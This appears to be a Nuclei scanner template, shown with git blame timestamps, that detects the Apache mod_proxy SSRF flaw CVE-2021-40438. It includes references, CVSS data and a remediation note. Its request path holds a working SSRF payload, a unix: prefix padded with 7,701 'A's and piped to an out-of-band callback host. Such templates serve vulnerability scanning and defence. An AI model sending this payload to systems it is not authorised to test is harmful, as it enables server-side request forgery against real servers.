nuclei-templates/http/cves/2021/CVE-2021-40438.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2021-10-14 19:59:52 +00:00
id: CVE-2021-40438
info:
2022-11-29 05:49:16 +00:00
name: Apache <= 2.4.48 - Mod_Proxy SSRF
2021-10-14 19:59:52 +00:00
author: pdteam
severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
2023-09-06 12:09:01 +00:00
remediation: Upgrade to Apache version 2.4.49 or later.
2021-10-14 19:59:52 +00:00
reference:
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
- https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9
cve-id: CVE-2021-40438
cwe-id: CWE-918
epss-score: 0.9712
epss-percentile: 0.99749
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: apache
product: http_server
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,ssrf,apache,mod-proxy,kev
2021-10-14 19:59:52 +00:00
http:
2021-10-14 19:59:52 +00:00
- method: GET
path:
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/'
2021-10-14 19:59:52 +00:00
host-redirects: true
2021-10-14 19:59:52 +00:00
max-redirects: 2
2021-10-14 19:59:52 +00:00
matchers:
2024-01-02 06:56:53 +00:00
- type: dsl
dsl:
- contains(header_1, "X-Interactsh-Version")